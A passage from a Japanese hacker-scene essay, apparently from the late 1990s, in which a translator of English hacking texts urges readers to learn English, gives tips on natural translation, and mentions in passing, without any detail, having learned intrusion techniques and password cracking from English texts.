みたいな文章だと思います。これに”それ”という単語を付けて翻訳して「昨夜コンピュータ ーが壊れました。私が思うにそれはウイルスを得たのでしょう」と訳したら、皆さんが理解出 来ますか?それより「オレのコンピューターが昨晩ぶっ壊れたぜ。多分ウイルスを喰らったん だと思う」と素直な日本語で直せばみんな意味が分かるでしょ?(笑)無理に訳す時は受験の 英語試験だけで良いのです。(爆)ここらへんは(4)を見てください。 (6)<<<英語ソフトを入れる>>> これも翻訳するには良い方法です。コンピューターを2台用意して、一台に日本語Windows 95、 もう一台に英語Windows 95を入れるとか。それかパーティションを区切って2つのOSを入れる なんてのもいいでしょう。英語と日本語、両方を使いこなせれば翻訳も楽になります。(経験 者談) (7)<<<英語を学ぶ>>> 誰も駅前留学しろとは言いません。(笑)ただ、英語を学ぶのがこの作業の一番近道です。翻 訳ソフトはほとんど使い物になりません。結局は己れの知識と経験が一番信用出来るのです。 チャットやIRCで外人と話したり、メール交換したりするのもいいでしょう。いつまでも日本語 に頼らず、英語の世界に入るのも勉強には適しています。そう、日本語テキストばかり読まない で英語のテキストを読んだりね(笑) //\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\ \\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\// 某所で「横浜で外人に喧嘩売れば英語を覚えられる」と書いてありますが、これは事実です(爆) 方法はどうであっても、結局は自分が英語を覚えないことにはどうにもなりません。翻訳ソフ トだっていつまでもあてには出来ないでしょう。それに知り合いの英語が出来る奴に翻訳を依 頼するのも、相手の都合によって出来ない事もあります。(金積めばやってくれるかも、、、) 結局は「自分で英語を勉強しろ!」としか言えないのです。これを読んでいる人で、翻訳に挑 戦してみようと思っている人、是非頑張ってください。そして少しでも私の作業を減らしてく ださいね(苦笑) 私は今までの得た知識の半分は英語テキストからです。恥ずかしい話、PHFバグやAnony FTPで の侵入、Windowsのレジストリ編集やパスワードCrackは、全て英語のテキストで学びました。 もし私が英語が出来なかったらこういう事を知るまでもうちょっと時間がかかったでしょう。 Guide To (moslty) Harmless Hackingは内容も素晴らしいですし、英語のレベルもそれほど 高度ではありませんので勧めます。そしてこれが完全に読める人は他のテキストも読めるハ ズです。これを機に皆さんも英語を学んだらいかがでしょうか。はっきり言って中学生並の 英語レベルがあれば、全ては理解出来なくても具体的な内容は理解出来ます。そこで「オレ は中学卒業したけどどのテキストも読めへんで!」と嘆いているなら、じゃあ中学3年の英 語の模擬テストでも受けてみてください。それで100点取れますか? ここで書いたことは、私が客観的に感じた事、そして私自身が思った事です。翻訳している人 全員が同じ事を思っているのではありません。だからこれを読んで「翻訳する奴はこう思って いるのか」なんて思わないでくださいね。あくまでも私の意見です。あしからず、、、、、 ・・・・・以上で私からは終わりです。少しではタシにはなったでしょうか。ネットには美味し い内容が満載された英語テキストが沢山公開されています。私も翻訳はしていませんが色々と面 白い情報をそういう所から入手しました。皆さんもそういうテキストを読まないなんて、なんか 損じゃないですか。それに英語が読めるようになると女の子からモテるようになるしね。(ちな みに私はこれで女を食った事はないが) そうそう。私にメールを送るのは構いませんが英文メールを張り付けて「これを翻訳して!」なんて メールは送らないでくださいね(苦笑)私は翻訳サービス屋さんではありませんので(笑) ~End~